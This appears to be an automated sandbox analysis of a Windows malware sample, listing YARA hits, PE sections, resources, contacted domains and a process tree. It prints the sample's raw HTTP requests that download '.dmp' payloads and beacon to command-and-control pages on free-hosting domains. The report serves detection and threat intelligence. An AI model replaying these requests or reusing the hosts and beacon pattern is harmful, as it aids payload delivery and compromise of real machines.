Yara Pattern Name | Description |
---|---|
IsPE32 | No Description Available |
HasOverlay | Overlay Check |
HasModified_DOS_Message | DOS Message Check |
MinGW_1 | No Description Available |
Big_Numbers3 | Looks for big numbers 64:sized |
Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
---|---|---|---|---|
.text | 0x00001000 | 0x00001484 | 0x00001600 | 5.73625436377 |
.data | 0x00003000 | 0x0005a010 | 0x0005a200 | 6.74483198277 |
.rdata | 0x0005e000 | 0x000001a0 | 0x00000200 | 4.1645328295 |
.eh_fram | 0x0005f000 | 0x000003a0 | 0x00000400 | 4.26827262382 |
.bss | 0x00060000 | 0x00000064 | 0x00000000 | 0.0 |
.idata | 0x00061000 | 0x00000474 | 0x00000600 | 4.05030532401 |
.CRT | 0x00062000 | 0x00000018 | 0x00000200 | 0.118369631259 |
.tls | 0x00063000 | 0x00000020 | 0x00000200 | 0.20448815744 |
.rsrc | 0x00064000 | 0x00003f30 | 0x00004000 | 4.35707637467 |
Name | Offset | Size | Language | Sub-language | File type |
---|---|---|---|---|---|
RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x000677ac | 0x00000468 | LANG_ENGLISH | SUBLANG_ENGLISH_US | GLS_BINARY_LSB_FIRST |
RT_GROUP_ICON | 0x00067c14 | 0x00000030 | LANG_ENGLISH | SUBLANG_ENGLISH_US | MS Windows icon resource - 3 icons, 48x48 |
RT_VERSION | 0x00067c44 | 0x000002ec | LANG_ENGLISH | SUBLANG_ENGLISH_US | data |
Domain | IP Address | Destination Location |
---|---|---|
quick.comuf.com | 153.92.0.100 | DE |
supportbackup.esy.es | Not Available | |
backupsupport.esy.es | Not Available | |
supportservice.netai.net | 153.92.0.100 | DE |
quicks.hol.es | Not Available | |
backupsupport.comxa.com | 153.92.0.100 | DE |
watson.microsoft.com | 52.184.220.162 | US |
GET /z/dwn13.dmp HTTP/1.1 Host: backupsupport.comxa.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /c13/dwn13.dmp HTTP/1.1 Host: quick.comuf.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /c/c13.php?m=a&h=c88b786c HTTP/1.1 Host: supportservice.netai.net Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
GET /z/c13.php?m=a&h=c88b786c HTTP/1.1 Host: backupsupport.comxa.com Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Accept-Encoding: deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
IP Address | Country of Origin |
---|---|
153.92.0.100 | DE |
Process Name | PID | Parent PID |
8ae318518503e8945ec4cc371e7546e1e6d9acc4dd3f575d69bf754dd7edd4a6.exe | 2452 | 2400 |
SearchHelper.exe | 2508 | 2452 |
com3.exe | 2556 | 2452 |
8ae318518503e8945ec4cc371e7546e1e6d9acc4dd3f575d69bf754dd7edd4a6.exe | 2608 | 2452 |
SearchHelper.exe | 1008 | 2608 |
com3.exe | 2216 | 2608 |
reg.exe | 2888 | 2556 |